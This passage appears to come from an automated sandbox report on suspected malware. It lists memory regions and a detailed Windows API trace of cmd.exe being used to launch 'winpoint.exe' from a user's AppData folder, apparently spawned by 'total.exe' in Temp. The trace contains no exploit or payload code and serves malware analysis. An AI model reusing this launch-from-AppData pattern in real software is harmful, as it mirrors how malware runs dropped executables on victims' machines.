AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1052 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1053 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1054 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1055 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1056 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1057 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1058 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1059 start_va = 0x4a920000 end_va = 0x4a96bfff entry_point = 0x4a920000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1060 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1061 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1062 start_va = 0x7efb0000 end_va = 0x7efd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1063 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1064 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1065 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1066 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1067 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1068 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1069 start_va = 0x270000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1070 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1071 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1072 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id 
= 1074 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1075 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1076 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1077 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1078 start_va = 0x756e0000 end_va = 0x756e6fff entry_point = 0x756e0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1079 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1080 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1081 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1082 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1083 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" 
(normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1084 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1085 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1086 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1087 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1088 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1089 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1090 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1091 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1092 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1093 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1094 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1095 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1096 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1097 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1098 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1099 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1100 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1101 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1102 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1103 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1104 start_va = 0x1c70000 end_va = 0x1fb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Thread: id = 59 os_tid = 0x894 [0160.412] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x22fb14 | out: lpSystemTimeAsFileTime=0x22fb14*(dwLowDateTime=0x61da0a70, dwHighDateTime=0x1d4406f)) [0160.412] GetCurrentProcessId () returned 0x890 [0160.412] GetCurrentThreadId () returned 0x894 [0160.412] GetTickCount () returned 0x30694 [0160.412] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb0c | out: lpPerformanceCount=0x22fb0c*=27862759647) returned 1 [0160.413] GetModuleHandleA (lpModuleName=0x0) returned 0x4a920000 [0160.414] __set_app_type (_Type=0x1) [0160.414] __p__fmode () returned 0x75c631f4 [0160.414] __p__commode () returned 0x75c631fc [0160.414] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9421a6) returned 0x0 [0160.414] __getmainargs (in: _Argc=0x4a944238, _Argv=0x4a944240, _Env=0x4a94423c, _DoWildCard=0, _StartInfo=0x4a944140 | out: _Argc=0x4a944238, _Argv=0x4a944240, _Env=0x4a94423c) returned 0 [0160.414] GetCurrentThreadId () returned 0x894 [0160.414] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x894) returned 0x60 [0160.414] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.414] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadUILanguage") returned 0x75cba84f [0160.414] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.416] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22faa4 | out: phkResult=0x22faa4*=0x0) returned 0x2 [0160.416] VirtualQuery (in: lpAddress=0x22fadb, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x130000, 
AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.416] GetConsoleOutputCP () returned 0x1b5 [0160.417] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a944260 | out: lpCPInfo=0x4a944260) returned 1 [0160.417] SetConsoleCtrlHandler (HandlerRoutine=0x4a93e72a, Add=1) returned 1 [0160.417] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.417] SetConsoleMode (hConsoleHandle=0x1a0, dwMode=0x0) returned 0 [0160.417] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.417] GetConsoleMode (in: hConsoleHandle=0x1a0, lpMode=0x4a9441ac | out: lpMode=0x4a9441ac) returned 0 [0160.417] _get_osfhandle (_FileHandle=0) returned 0x198 [0160.417] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0x4a9441b0 | out: lpMode=0x4a9441b0) returned 0 [0160.418] GetEnvironmentStringsW () returned 0x342238* [0160.418] FreeEnvironmentStringsW (penv=0x342238) returned 1 [0160.418] GetEnvironmentStringsW () returned 0x342238* [0160.418] FreeEnvironmentStringsW (penv=0x342238) returned 1 [0160.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea14 | out: phkResult=0x22ea14*=0x68) 
returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x0, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x0, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegCloseKey (hKey=0x68) returned 0x0 [0160.419] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea14 | out: phkResult=0x22ea14*=0x68) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x0, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x9, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x9, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x9, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegCloseKey (hKey=0x68) returned 0x0 [0160.419] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8801d6 [0160.419] srand (_Seed=0x5b8801d6) [0160.419] GetCommandLineW () returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0160.419] GetCommandLineW () returned="cmd /c start \"\" \"C:\\Users\\aDU0VK 
IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0160.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a945260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.420] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x344568, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0160.420] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.420] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.420] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0160.420] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.420] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.420] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.420] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.420] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.420] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.420] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.420] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.420] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.420] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7e0 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.420] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x22f7e0, lpFilePart=0x22f7dc | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x22f7dc*="Temp") returned 0x24 [0160.420] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.420] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.421] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.421] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.421] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.421] _wcsnicmp (_String1="ADU0VK~1", _String2="ADU0VK~1", _MaxCount=0x8) returned 0 [0160.422] _wcsicmp (_String1="aDU0VK IWA5kLS", _String2="ADU0VK~1") returned -94 [0160.422] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.422] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.422] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.422] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.422] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.422] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.422] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.422] SetCurrentDirectoryW (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 1 [0160.422] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 1 [0160.422] GetEnvironmentStringsW () returned 0x342238* [0160.423] FreeEnvironmentStringsW (penv=0x342238) returned 1 [0160.423] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a945260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.423] GetConsoleOutputCP () returned 0x1b5 [0160.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a944260 | out: lpCPInfo=0x4a944260) returned 1 [0160.423] GetUserDefaultLCID () returned 0x409 [0160.423] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a944950, cchData=8 | out: lpLCData=":") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f920, cchData=128 | out: lpLCData="0") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f920, cchData=128 | out: lpLCData="0") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f920, cchData=128 | out: lpLCData="1") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a944940, cchData=8 | out: lpLCData="/") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a944d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a944d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a944d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a944cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a944c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a944c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.424] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a944c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a944930, cchData=8 | out: lpLCData=".") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a944920, cchData=8 | out: lpLCData=",") returned 2 [0160.424] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.425] GetConsoleTitleW (in: lpConsoleTitle=0x330888, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 0x2e [0160.425] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.425] GetProcAddress (hModule=0x75c90000, lpProcName="CopyFileExW") returned 0x75cc3b92 [0160.425] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0160.425] GetProcAddress (hModule=0x75c90000, lpProcName="SetConsoleInputExeNameW") returned 0x75cba79d [0160.426] _wcsicmp (_String1="start", _String2=")") returned 74 [0160.426] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0160.426] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0160.426] _wcsicmp (_String1="IF", _String2="start") returned -10 [0160.426] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0160.426] _wcsicmp (_String1="REM", _String2="start") returned -1 [0160.426] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0160.427] GetConsoleTitleW (in: lpConsoleTitle=0x22f618, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 0x2e [0160.428] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0160.428] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0160.428] _wcsicmp (_String1="start", 
_String2="CD") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="REN") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="SET") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0160.428] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0160.428] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0160.428] _wcsicmp (_String1="start", _String2="MD") returned 6 [0160.428] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0160.428] _wcsicmp (_String1="start", _String2="RD") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0160.428] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0160.428] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0160.428] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0160.428] _wcsicmp (_String1="start", _String2="VER") returned -3 [0160.428] _wcsicmp 